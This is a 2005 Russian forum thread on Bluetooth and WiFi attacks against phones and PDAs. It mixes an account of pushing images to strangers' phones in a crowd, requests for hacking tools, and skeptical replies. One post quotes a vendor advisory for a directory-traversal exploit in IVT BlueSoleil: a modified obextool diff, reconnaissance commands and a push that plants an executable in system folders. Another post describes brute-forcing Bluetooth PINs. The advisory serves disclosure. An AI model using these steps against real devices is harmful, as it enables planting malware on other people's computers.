Взлом мобильников и КПК через Bluetotch и WiFi

Тема в разделе "WASM.NETWORKS", создана пользователем Swing, 23 май 2005.

  1. Swing

    Swing New Member

    Публикаций:
    0
    Регистрация:
    18 май 2005
    Сообщения:
    25
    Недавно узнал, что мою мобилу (Nokia 6230) могут взломать через "Синий зуб".Оказывается, если в телефоне выставлен режим:

    Включить Bluetooth -> Виден всем



    То в телефон, можно залезть с другого мобильника, скачать видео, фотографии,диктофонные записи, адресную книгу, подслушивать разговоры хозяина телефона и т.п. Для взлома, используется другой телефон, с инсталлированным J2ME софтом, юзающим Bluetooth API или КПК.



    Ради эксперимента, поехал сегодня после работы на Пушкинскую площадь(Москва),и походил с телефоном в толпе гуляющего народа. За полчаса, "поймал" десяток сигналов от телефонов с режимом Bluetooth -> Виден всем. Ради прикола, скидывал им разные фотки, и два человека даже приняли их! Поражает их беспечность, ведь так запросто можно получить J2ME вирус и вредоносную программу под Symbian OS.



    Bluetooth c обычного мобильника, работает не далее 10-15 метров, а если использовать специальную узконаправленную антенну, то мобильники можно взламывать на расстоянии до 1.5 км!

    А сейчас полным ходом идет внедрение новой технологии: WiFi.

    Устройства WiFi могут работать на расстоянии до 500 метров со скоростью 11 мбит/сек. Все новые КПК и смартфоны ее поддерживают.

    Сейчас в Москве, есть уже более 40 точек, где можно нахаляву выйти в интернет через WiFi. Никакой оплаты за траффик, качай сколько влезет!



    Пользователи, прямо дома устанавливают антенны WiFi и открывают через них доступ в сети и интернет. Раздолье для хакеров.



    Вот список мест в Москве, где есть бесплатный доступ в инет через WiFi



    Аэропорт Домодедово

    Аэропорты Шереметьево-1 и Шереметьево-2

    Американский Бар и Гриль (м. Маяковская, 1-я Тверская-Ямская д. 2 стр.1)

    Американский Бар и Гриль (м. Курская, Таганская, Земляной вал д. 59)

    Санта Фе (м. 1905 года, Мантулинская ул., д. 5/1, стр. 6).

    Кинотеатр «Кодак-Киномир» (м. Пушкинская)

    TGI Friday’s (м. Пушкинская, Тверская, Чеховская, ул. Тверская д. 19/2)

    TGI Friday’s (м. Октябрьская, Ленинский проспект д. 1/2 корп. 1)

    TGI Friday’s (м. Курская, ТЦ «Атриум»)

    TGI Friday’s (м. Новые Черемушки, ул. Гарибальди д. 23 ТЦ «Панорама»)

    StarLight (м. Октябрьская, Октябрьская площадь, ул. Коровий вал)

    Бахус (ул. Малая Бронная д. 20А)

    Рамстор (ул. Миклухо-Маклая д. 32А)

    Рамстор (ул. Ярцевская д. 12)

    Рамстор (ул. Правобережная д. 1)

    Hard Rock Cafe (ул. Арбат, д. 44)

    Timeonline (Большой Кондратьевский пер. д. 7)

    Timeonline (ТЦ «Охотный ряд», нижний уровень)

    Ирис Конгресс Отель (Коровинское шоссе д. 10)

    Киноплекс на Ленинском (Ленинский проспект д. 146)

    Mariott Отель (1-я Тверская-Ямская д. 34)

    Mariott Отель (ул. Петровка д. 11/20)

    Mariott Отель (ул. Тверская д. 26)

    ТЦ «Смоленский пассаж» (Смоленская площадь д. 3)

    ТЦ «Мега» (Калужское шоссе)

    Grand Imperial (Гагаринский пер. д. 5/9)

    Этаж (ул. Тверская д. 14)

    Кофемания (Кудринская пл. д. 46/54)

    Кофемания (ул. Большая Никитская д. 13)

    Кофемания (ул. Рождественка д. 6/20)
     
  2. Swing

    Swing New Member

    Публикаций:
    0
    Регистрация:
    18 май 2005
    Сообщения:
    25
    Да и еще, если у вас есть ссылки на хакерский софт для J2ME и WiFi скиньте сюда ссылки...
     
  3. NoName

    NoName New Member

    Публикаций:
    0
    Регистрация:
    1 авг 2004
    Сообщения:
    1.229
    Я сидел на BT & WF в инете, что ж хорошо конечно, но за качество приходится расплачиватся безопасностью.

    Была отличная книжка товарища O'Relly по таким вещам. Подобные книжки выпускают и на русском. Я даже трогал руками бумажные издания. В будущем эти технологии будут везде, их заменят более совершенные, но основа закладывается сегодня, поэтому очень полезно интересоватся такими вещами, потому что это весьма перспективно.
     
  4. Quantum

    Quantum Паладин дзена

    Публикаций:
    0
    Регистрация:
    6 янв 2003
    Сообщения:
    3.143
    Адрес:
    Ukraine
    Swing



    J2ME не имеет никакого доступа к харду, так что вирусы на J2ME - миф. Вирусы под Symbian из той же оперы, причём их ещё запустить нужно, что нормальный пользователь делать не будет.





    Не получится. Максимум 1 км, да и то в прямой видимости. Мобильник такой сигнал может и примет, но ответить он не сможет, а без предварительного "рукопожатия" никакой связи не будет.



    BT, как технология, скоро вымрет (малый радиус действия, дорогостоящий хард, плохой маркетинг).





    Не такая уж она и новая... но тут действительно существуют проблемы безопасности. Во всём виновата IEEE. WiFi, между прочим, имеет существенный недостаток - не имеет мобильности, но зато этот стандарт полностью поддерживает Intel.



    Могу порекомендовать книгу "Real 802.11 Security: Wi-Fi Protected Access and 802.11i" by Jon Edney. Если хорошо поискать в P2P...
     
  5. Swing

    Swing New Member

    Публикаций:
    0
    Регистрация:
    18 май 2005
    Сообщения:
    25
    J2ME не имеет никакого доступа к харду, так что вирусы на J2ME - миф



    J2ME имеет доступ к Bluetooth API и IrDa API, а значит Java вирусы могут распостранятся, кроме того можно получить J2ME виря приаттаченного к MMS сообщению.



    Вирусы под Symbian из той же оперы, причём их ещё запустить нужно, что нормальный пользователь делать не будет.



    Опоздали батенька, вирусы и черви для Symbian уже созданы. Наиболее известный(он уже живет в Москве) червь Cabir, приходит через Синий Зуб, и предлагает себя открыть, 50% юзеров так и делают...



    Не получится. Максимум 1 км, да и то в прямой видимости. Мобильник такой сигнал может и примет, но ответить он не сможет, а без предварительного "рукопожатия" никакой связи не будет



    Вот ссылка на антенну



    http://newmobileportal.ru/modules/news/print.php?storyid=32



    «Взлом» телефонов в тестах Лори был возможен на расстоянии до 15м (эффективной дистанцией действия Bluetooth считается расстояние до 10м), однако с новой снайперской «винтовкой» BlueSniper, также продемонстрированной на конференциях, расстояние может быть увеличено до 1.5 км. Разработанная в компании Flexilis Джоном Герингом (John Hering), BlueSniper представляет собой направленную антенну с оптическим прицелом, подсоединенную к лаптопу или КПК. «Стреляя» по прохожим с 11-го этажа отеля «Алладин» в Лос-Анджелесе, создателям BlueSniper удалось получить адресные книги с 300 мобильных Bluetooth устройств.





    [​IMG] 1913075241__bthacker.jpg
     
  6. Swing

    Swing New Member

    Публикаций:
    0
    Регистрация:
    18 май 2005
    Сообщения:
    25
    Собираем ружьё Bluetooth: охота за "синими зубами". Часть 1



    Вот статья с описанием ружья Bluetooth для взлома мобильников



    http://www.thg.ru/network/20050316/print.html
     
  7. q_q

    q_q New Member

    Публикаций:
    0
    Регистрация:
    5 окт 2003
    Сообщения:
    1.706
    Swing

    ... телефонов с режимом Bluetooth -> Виден всем ... предлагает себя открыть, 50% юзеров так и делают ...

    Imho это проблемы чайников.

    Мой телефон предупреждает о попытке и запрашивает согласие на связь.
     
  8. Swing

    Swing New Member

    Публикаций:
    0
    Регистрация:
    18 май 2005
    Сообщения:
    25
    Imho это проблемы чайников.



    Ты думаешь мало на свете чайников? Походи по центру своего города, где много народу с дорогими мобильниками и КПК, увидишь большое количество включенных "Синих зубов"..
     
  9. Swing

    Swing New Member

    Публикаций:
    0
    Регистрация:
    18 май 2005
    Сообщения:
    25
    Наткнулся на целый сайт посвященный блюджэкингу

    Хакингу и развлечениям с "Синими Зубами", и что самое главное есть халявный J2ME софт для сканинга



    http://bluejack.ru/
     
  10. q_q

    q_q New Member

    Публикаций:
    0
    Регистрация:
    5 окт 2003
    Сообщения:
    1.706
    Swing

    Ты думаешь мало на свете чайников?

    И что дальше, какой вывод, писать вирусы или антивирусы?
     
  11. MoKC0DeR

    MoKC0DeR New Member

    Публикаций:
    0
    Регистрация:
    13 ноя 2003
    Сообщения:
    136
    Адрес:
    Russia
    Swing

    Проблема из разряда надуманных :)



    Ага а если твой компьютер находится в сети с реальным айпи без файрвола и заплаток то шанс быть взломанным раз 100 выше.



    P.S. Вообщето 6230 запрашивает подтверждение подкючения прежде чем дать доступ.
     
  12. Quantum

    Quantum Паладин дзена

    Публикаций:
    0
    Регистрация:
    6 янв 2003
    Сообщения:
    3.143
    Адрес:
    Ukraine
    Swing



    Через IrDa вирь далеко не уйдёт :)

    BT есть лишь в дорогих мобильниках. Хорошо. Допустим, что 50% юзверей самых дорогих мобильников - лохи. Даже в таком случае вреда от этих "вирусов" никакого не представляется: в автозапуск J2ME-приложение не прописывается, JVM можно в любой момент прибить нажатием одной кнопы, приложение обязательно видно на экране...





    Видел. До реальных вирусов и червей им ещё далеко.





    Не спорю.





    Вопиющая ложь! В оригинальной статье написано, что 800м. (half a mile). Просто на сайте Ericsson написано, что максимальный радиус действия BT - чуть больше километра (это с фирменными усилителями на обоих концах канала и без помех, т.е. в городских условиях это не реально), вот переводчики и "подправили" циферки в статье.





    Раз уж эти люди склонны преувеличивать, то доверять их словам, IMHO, не стОит.
     
  13. rst

    rst New Member

    Публикаций:
    0
    Регистрация:
    5 май 2003
    Сообщения:
    165


    „А сейчас полным ходом идет внедрение новой технологии: WiFi“

    Не такая уж она и новая... но тут действительно существуют проблемы безопасности. Во всём виновата IEEE. WiFi, между прочим, имеет существенный недостаток - не имеет мобильности, но зато этот стандарт полностью поддерживает Intel.


    Да херь.

    1) Во-первых есть мобильность ( а именно роуминг - т.е. переключение между точками автоматическое)

    2) WPA-PSK + IPSec ( у меня дома и на работе, и чуствую себя секурным ) AP подключен к одному серверу, а не к общей сетке, и через этот сервер без IPSec не пролезешь.
     
  14. rst

    rst New Member

    Публикаций:
    0
    Регистрация:
    5 май 2003
    Сообщения:
    165
    Quantum - а насчет взлома через синезуб - тут ты не прав. Очень даже реально. Софт в мобилах дырявый\непатчится в 99% случаев на протяжении всей жизни мобилы. И в том же J2ME есть куча дыр - будь уверен.

    Касаетельно BT-софта :



    [Full-disclosure] DMA[2005-0401a] - 'IVT BlueSoleil Directory Transversal'



    * This message: [ Message body ] [ More options ]

    * Related messages: [ Next message ] [ Previous message ]



    From: KF (Lists) <kf_lists_at_digitalmunition.com>

    Date: Mar 31 2005



    DMA[2005-0401a] - 'IVT BlueSoleil Directory Transversal'

    Author: Kevin Finisterre

    Vendor: http://www.bluesoleil.com/products/index.asp,

    http://www.ivtcorporation.com/



    Product: 'IVT BlueSoleil 1.4'

    References: .txt
    ]http://www.digitalmunition.com/DMA[2005-0103a].txt



    Description:

    90% of the USB Bluetooth dongles you find on the market will come with drivers from

    Widcomm. Out of the 7 dongles I own only one does not use some flavor of Widcomm. My

    SMC Networks SMC-BT10 came with IVT BlueSoleil 1.4 software.



    BlueSoleil for Windows is a set of Bluetooth Application Profiles implemented on the

    Windows platform. BlueSoleil is fully compliant with the Bluetooth SIG's latest

    specifications. It can enable PCs to form networks and exchange information wirelessly.

    It can also provide PC's a fast and reliable solution for effortless wireless connections

    to mobile phones, headsets, PDA's, Access Points, Printers, Digital Cameras, PC peripherals,

    etc. BlueSoleil supports more than ten Bluetooth chip-sets and different HCI interfaces

    which include USB, UART, PCMCIA and Compact Flash.



    My BlueSoleil install was performed on a Windows XP SP2 machine using the above mentioned

    SMC-BT10. I chose all program defaults during the install. Upon rebooting my machine the

    "Welcome to Bluetooth" screen was displayed and I was asked for a device name and type. I

    was told that my security level was set to 'Medium' and that other devices must provide a

    Bluetooth passkey before connecting with my computer. I was given the option to disable this

    security authentication by simply unchecking a box and clicking ok to continue. My PDA can

    be pickey about using a pass key so I did go with 'Low' security. The BlueSoleil website

    mentioned that 'some old dongles my not support some operations' when dealing with using the

    key functions. This behavior could obviously prompt other users to set security to 'Low'.



    Regardless of the security setting you should know that it is possible for an attacker to

    take advantage of at least one vulnerability in the IVT software. All of my testing was done

    on Version PTP-1.4.9-Win2k/XP-04.08.27 with Stack Version 04.03.11.20040827. I can not vouch

    for the behavior of any other versions of BlueSoleil. Even connections that make use of

    pins are vulnerable.



    By default the Object Push Service is Auto-started when BlueSoleil is opened. Any files that

    are pushed to the device should show up in which ever directory the user specified during

    configuration. The default is C:\Documents and Settings\<username>\My Documents\Bluetooth\inbox



    In order to exploit this issue all we need is a modified obextool.c from ussp-push-0.2:



    @@ -316,7 +316,7 @@

    }



    filename = argv[1];

    - alias = basename(filename);

    + alias = "../../../../../../../../mal.exe";

    str2ba(argv[2], &bdaddr);

    channel = (argc > 3) ? atoi(argv[3]) : 10;



    You obviously need a working bluetooth dongle on your machine. First scan for a device that

    *may* be running BlueSoleil. Archiving a list of known dongles that come with the install media

    would obviously be a good idea for future attacks. In the example below the machine 'jdam' is

    attacking 'threat-win32'.



    Scan for the machine.

    jdam:~# hcitool scan

    Scanning ...

    00:11:B1:07:BE:A7 threat-win32



    Verify that the Object Push service exists.



    jdam:/tmp/ussp-push-0.2# sdptool search OPUSH 00:11:B1:07:BE:A7

    Inquiring ...

    Searching for OPUSH on 00:11:B1:07:BE:A7 ...

    Service Name: OPP Server

    Service RecHandle: 0x10005

    Service Class ID List:

    "OBEX Object Push" (0x1105)

    Protocol Descriptor List:

    "L2CAP" (0x0100)

    "RFCOMM" (0x0003)

    Channel: 4

    "OBEX" (0x0008)

    Language Base Attr List:

    code_ISO639: 0x656e

    encoding: 0x6a

    base_offset: 0x100

    Profile Descriptor List:

    "OBEX Object Push" (0x1105)

    Version: 0x0100



    Break out your modified obextool binary. Make use of the Channel listed in the

    sdptool output.



    jdam:/tmp/ussp-push-0.2# ./obextool

    Bluetooth OBEX tool

    Usage:

    obextool [options] <command>

    Options:

    -i [hciX|bdaddr] Local HCI device or BD Address

    -h, --help Display help

    Commands:

    push <file> <bdaddr> [channel] Push a file



    Pick your binary and send away!



    jdam:/tmp/ussp-push-0.2# ./obextool push calc.exe 00:11:B1:07:BE:A7 4

    Sending object ...



    For about 10 seconds the following messages are visible on the screen of the attacked

    device. The window only stores 3 messages however so its really easy to make them scroll

    by with some fake business card requests.



    * Remote device (00:20:E0:4C:CF:lol: F) has connected to my Object Push service!

    * An object ../../../../../../../mal.exe is received.

    * Remove Device (00:20:E0:4C:CF:lol: F) has disconnected from my Object Push service!



    jdam:/tmp/bt-tools# ~/qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -g anything.vcf



    * Remote device (00:20:E0:4C:CF:lol: F) has connected to my Object Push service!

    * Your Business card is sent on remote user's request.

    * Remove Device (00:20:E0:4C:CF:lol: F) has disconnected from my Object Push service!



    After the attack rather than being bound to the Bluetooth\inbox directory the binary is

    placed pretty much anywhere on the filesystem we want it.



    C:\>dir mal.exe

    Volume in drive C has no label.

    Volume Serial Number is F888-ED9A



    Directory of C:\



    07/01/2005 09:28 PM 114,688 mal.exe

    1 File(s) 114,688 bytes

    0 Dir(s) 38,813,556,736 bytes free



    Plenty of other variations are available and some may depend on the user that is logged into

    the system.



    You can obviously be creative and use anything that you think the either user or system may run.

    alias = "../../../../../../../WINDOWS/System32/taskmgr.exe"; works real well. Especially

    if the user misses the really obvious message on their console because you made it scroll by.

    Paranoid users tend to break out Task Manager pretty quick when something sketchy happens. Then

    again perhaps a paranoid user would not have his bluetooth wide open?



    I attempted to test IVT BlueSoleil for WinCE however it would not run on my device so I can

    not verify the bahavior there.



    I contacted the BlueSoleil staff multiple times after our initial exchange and for some reason

    all attempts at contact resulted in zero answer. The initial response was so prompt I was

    surprised no one attempted to contact me further after multiple attempts on my part.



    <rant>

    Due to the fact that Bluetooth vendors are acting weird right now I don't even feel like

    playing the typical game that goes on in the disclosure process. A perfect example of this

    'weirdness' can be found with Widcomm / Broadcomm and the issues that pentest_co_uk partially

    disclosed last year. 90% of the bluetooth dongles you can buy in the store are vulnerable to attack

    and the end user is totally the dark about it. Beacause of half assed disclosure and most likely

    some political BS I would estimate that LOADS of Bluetooth devices can be attacked. Good luck

    getting a software update for your Widcomm product, although new drivers are available the license.dat

    will give your dongle NO love. Some folks have even gone to the extreme of patching Widcomms licensing

    software just so they could use an update, they were however quickly smacked down:

    http://www.wifi-forum.com/wf/archive/index.php/t-6631.html





    Both version 3 (the one supposed to patch pentest_co_uk's issues) and version 4 are out but chances

    are you are still vulnerable because you can't install the software. I hear you can bitch at some

    vendors enough that they will send you a new dongle that is licensed for newer software. I also hear

    i its about like pulling teeth. Have you got a PDA? heh good luck. hrmm what was that line again,

    '...(we) recommend that end users stop using the vulnerable WIDCOMM Bluetooth software'. Alternately

    users can 'set their Bluetooth device configuration to be non-discoverable or hidden.'. Please note

    however 'This will not stop the device from being vulnerable but it may limit the exposure.'



    If you use Bluetooth try to educate yourself about the software you are using and hound your vendor

    for patches!

    </rant>



    All your Bluetooth are belong to greenplaque.



    Timeline associated with this bug:

    03/24/2005 prompt and immediate response from support@bluesoleil.com inquiring about the bug

    03/24/2005 Object Push vulnerability disclosed to BlueSoleil Support with request for follow up.

    03/28/2005 Request for an update and vendor confirmation of the bug.

    03/29/2005 Secondary ping for an update... surprised I did not get the same prompt response.

    03/30/2005 Final ping and attempt to make sure the bug was understood by BlueSoleil staff.

    03/31/2005 Message indicating disclosure based on lack of communication surrounding the issue.



    Workaround:

    '...(we) recommend that end users stop using the vulnerable BLUESOLEIL Bluetooth software'. Alternately

    users can 'set their Bluetooth device configuration to be non-discoverable or hidden.'. Please note

    however 'This will not stop the device from being vulnerable but it may limit the exposure.'



    Short of the prompt response I got on the first day NO other attempts at communication were made

    by BlueSoleil staff.



    Other vendors are affected by similar issues and future advisories will be released.



    -KF
     
  15. Quantum

    Quantum Паладин дзена

    Публикаций:
    0
    Регистрация:
    6 янв 2003
    Сообщения:
    3.143
    Адрес:
    Ukraine
    rst



    Действительно, это я что-то перепутал. Похоже, что роуминг осуществляется софтом, т.к. есть девайсы с WiFi, которые не поддерживают роаминг, что и ввело меня в заблуждение.





    А я и не спорю, что начиная с 4го уровня OSI и выше можно обеспечить безопасность через софт.





    Типичная троянская стратегия опирается на чел. фактор и работает безотказно независимо от уровня безопасности. То, что злоумышленник может написать дырявый софт (игру, например) и добиться того, что юзверь установит этот софт себе на мобильник и запустит его, не имеет никакого отношения к безопасности BT или безопасности J2ME.





    Есть баги, которые я лично видел, но дыры... Во-первых, хакеру не видать исходного кода JVM. Во-вторых, нет в арсенале отладчика. Обнаружить дыру в таких условиях можно лишь чисто случайно. В общем, я очень скептически отношусь к этому вашему заявлению.





    Интересный багрепорт. Спасибо!
     
  16. kaspersky

    kaspersky New Member

    Публикаций:
    0
    Регистрация:
    18 май 2004
    Сообщения:
    3.006
    схема аутентификации голубого зуба

    (там, где она вообще реализована)

    выглядит так:

    Первый шаг: Инициатор соединения (claimant) посылает заинтересованному устройству (verifier) свой уникальный 48-битный аппаратный адрес (BD_ADDR), в каком-то смысле похожий на обычный MAC-адрес, зашитый в каждой сетевой карте;



    Второй шаг: Verifier передает claimant'у 128-битную привязку (challenge), генерируемую случайным образом, и обозначаемую как AU_RAND;



    Третий шаг: на основе BD_ADDR, Link Key и challenge Verifier генерирует секретную шифропоследовательность (SRES), тоже самое делает иclaimant;



    Четвертый шаг: полученную шифропоследовательность claimant передает Verifier'у;



    Пятый шаг: Verifier сравнивает вычисленную им SRES с откликом claimant'а и если они совпадают, устанавливает соединение.



    Таким образом, в открытом виде PIN-код не передается и поэтому не может быть перехвачен! Однако, он может быть подобран. В самом деле, мы можем перехватить BD_ADDR, AU_RAND и SRES, после чего нам остается всего лишь подобрать такой Link Key, который бы при заданных BD_ADDR и AU_RAND выдавал идентичный SRES.



    даже полностью защищенные телефоны типа того же Siemens'а могут быть взломаны лобовым перебором. 4х-значный PIN вскрывается за несколько секунд и даже если в будущих моделях производители увеличат длину PIN-кода до 16-байт, это не остановит взломщиков, но сильно напряжет пользователей. Такой PIN запомнит далеко не каждый, а это значит, что повсеместно будут использоваться осмысленные "словарные" номера, существенно упрощающие их перебор...
     
  17. kaspersky

    kaspersky New Member

    Публикаций:
    0
    Регистрация:
    18 май 2004
    Сообщения:
    3.006
    > Imho это проблемы чайников.

    > Мой телефон предупреждает о попытке и запрашивает

    > согласие на связь.

    даже при передаче AT-команд по OBEX протоколу?

    если это так (в чем я сомневаюсь) то что

    за модель телефона? пропробуй передай сам себе

    AT-команду (любую) и посмотри на реакцию телефона.